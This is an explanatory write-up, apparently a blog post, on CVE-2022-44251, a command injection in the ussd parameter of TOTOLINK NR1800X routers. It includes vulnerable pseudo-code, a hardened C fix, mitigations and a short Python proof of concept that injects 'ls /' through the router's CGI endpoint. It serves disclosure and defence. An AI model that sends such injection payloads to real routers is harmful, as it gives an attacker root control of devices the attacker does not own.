In late 2022, a high-severity vulnerability was disclosed affecting TOTOLINK NR1800X routers running firmware version V9.1.u.6279_B20210910. Tracked as CVE-2022-44251, the flaw is an OS command injection: an attacker who can reach the router's web interface can inject shell commands through the ussd parameter of the setUssd method, and they run with the privileges of the web server process (root on this firmware).

Here is a step-by-step breakdown of how the vulnerability works, including an analysis, snippets of relevant code, practical exploit details, and links to the original sources.

What is CVE-2022-44251?

The router's admin panel lets the owner configure a 3G/4G USB dongle by sending USSD codes (short strings such as *123#) to the modem. The web interface endpoint that handles this takes a ussd parameter from the HTTP request and hands it to a shell without validating it, so an attacker who can submit requests to the interface can append arbitrary commands. The public advisory does not state whether authentication is required; treat any network position that can reach the admin interface as sufficient.

Affected Device:  
TOTOLINK NR1800X  
Firmware: V9.1.u.6279_B20210910

Where is the Vulnerability?

The flaw stems from a function called setUssd, which reads the ussd parameter from the HTTP request. The value is never checked against what a USSD code can legitimately contain (digits, * and #); it is formatted straight into a command line and passed to a system shell, so shell metacharacters such as ;, |, $( ) and backticks are interpreted.

Vulnerable Endpoint (Example)

Requests to TOTOLINK's web interface go through the CGI dispatcher /cgi-bin/cstecgi.cgi; the exact parameter names below are illustrative, the parameter that matters is ussd:

POST /cgi-bin/cstecgi.cgi
Content-Type: application/x-www-form-urlencoded

topic=wifi_host_ussd&op=set&ussd=*123#

The ussd value is entirely user-controlled.

Here is simplified pseudo-code illustrating the logic (not the vendor's actual source; the /bin/usb_ussd helper is a placeholder for whatever the firmware invokes):

// Inside setUssd(): ussd points at the raw value from the HTTP request
char cmd[128];
snprintf(cmd, sizeof(cmd), "/bin/usb_ussd %s", ussd);  // <-- No sanitization: ussd is pasted into a shell command line
system(cmd);  // command injection occurs here: /bin/sh -c parses the whole string

If an attacker passes something like *123#;ls, the command line becomes

/bin/usb_ussd *123#;ls

The shell runs /bin/usb_ussd *123# and then ls as a second command, with the privileges of the web server process (root on this firmware). Any other command, including one that downloads and starts a payload, works the same way.
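To make the fix concrete, the following is an added example (not TOTOLINK code) that puts the unsafe pattern from the pseudo-code above next to a hardened version. It assumes the same placeholder helper /bin/usb_ussd taking the USSD code as a single argument. The hardened path does two things: it allowlists the input (a USSD code is only digits, * and #), and it launches the helper with fork/execv so that no shell ever parses the string, which removes the injection even if the allowlist were later loosened.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example, not vendor code. /bin/usb_ussd and its one-argument
 * interface are assumptions carried over from the pseudo-code above. */

/* Vulnerable builder: returns the command line that system() would
 * receive. Kept separate from execution so the injected text can be
 * inspected; the original code calls system() on this string. */
const char *build_cmd_unsafe(const char *ussd) {
    static char cmd[128];
    snprintf(cmd, sizeof(cmd), "/bin/usb_ussd %s", ussd);  /* no sanitization */
    return cmd;
}

/* A USSD code is digits plus '*' and '#', and is short. Allowlisting
 * rejects every shell metacharacter without trying to enumerate them. */
#define USSD_MAX 60

int ussd_is_valid(const char *ussd) {
    if (ussd == NULL) return 0;
    size_t len = strlen(ussd);
    if (len == 0 || len > USSD_MAX) return 0;
    for (size_t i = 0; i < len; i++) {
        char c = ussd[i];
        if (!isdigit((unsigned char)c) && c != '*' && c != '#')
            return 0;
    }
    return 1;
}

/* Hardened launcher: validate first, then fork/execv with an argv array.
 * The USSD code travels as one argument and no /bin/sh is involved.
 * Returns the helper's exit status, or -1 on rejection or launch error. */
int run_ussd_safe(const char *ussd) {
    if (!ussd_is_valid(ussd))
        return -1;                       /* reject, do not try to "escape" */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)"/bin/usb_ussd", (char *)ussd, NULL };
        execv(argv[0], argv);
        _exit(127);                      /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    const char *attack = "*123#;ls /";
    printf("unsafe command line: %s\n", build_cmd_unsafe(attack));
    printf("valid(\"*123#\")      = %d\n", ussd_is_valid("*123#"));
    printf("valid(\"%s\") = %d\n", attack, ussd_is_valid(attack));
    printf("run_ussd_safe(attack) = %d (rejected before any exec)\n",
           run_ussd_safe(attack));
    return 0;
}
```

The allowlist is the important part: escaping or quoting the value for the shell is fragile, while refusing anything outside the legitimate character set is easy to reason about. Using execv on top of that means the command line is never re-parsed, so the class of bug disappears rather than just this instance.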

Proof of Concept (PoC) Exploit

Below is a basic example exploit written in Python. It injects the command ls / through the vulnerable ussd parameter; the response body, if the CGI echoes the helper's output, shows whether the injected command ran.

import requests

host = "http://192.168.0.1"  # Change to match your router's IP
url = f"{host}/cgi-bin/cstecgi.cgi"

payload = "*123#;ls /"  # The injected command is 'ls /'
data = {
    "topic": "wifi_host_ussd",
    "op": "set",
    "ussd": payload,
    # Add other required parameters (e.g. a session token) if the firmware needs them
}

# A short timeout keeps the script from hanging if the injected command blocks
r = requests.post(url, data=data, timeout=10)
print(r.status_code)
print(r.text)

Warning: Only use this on devices you own and have permission to test!

Impact

- Local Network: Any user or malware inside the local network can gain root access on the router.
- Remote Attacks: If the router's admin interface is exposed to the internet, a remote attacker can compromise the router.
- Persistence: An attacker could use this to install rootkits, sniff traffic, or add user accounts.

Mitigation and Recommendations

- Update Firmware: TOTOLINK may have released firmware fixes since the disclosure. Run the latest firmware for your model (check TOTOLINK's support page) and confirm the installed version is newer than V9.1.u.6279_B20210910.
- Restrict Admin Access: Block remote/web access to your router's admin console from outside your trusted network, and limit which LAN hosts can reach it where the firmware allows.

References and Further Reading

- NVD entry: CVE-2022-44251
- Exploit Database write-up: exploit-db 51498
- TOTOLINK official website
- TOTOLINK firmware download page for the NR1800X
- Chinese-language security report (知乎)

Final Thoughts

CVE-2022-44251 highlights how a single unsanitized input passed to a shell can let attackers take full control of a home router. If you use a TOTOLINK NR1800X, patch as soon as possible, keep the admin interface off the internet, and follow basic security hygiene.

Stay tuned for future updates and keep your devices locked down!

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:42:00 UTC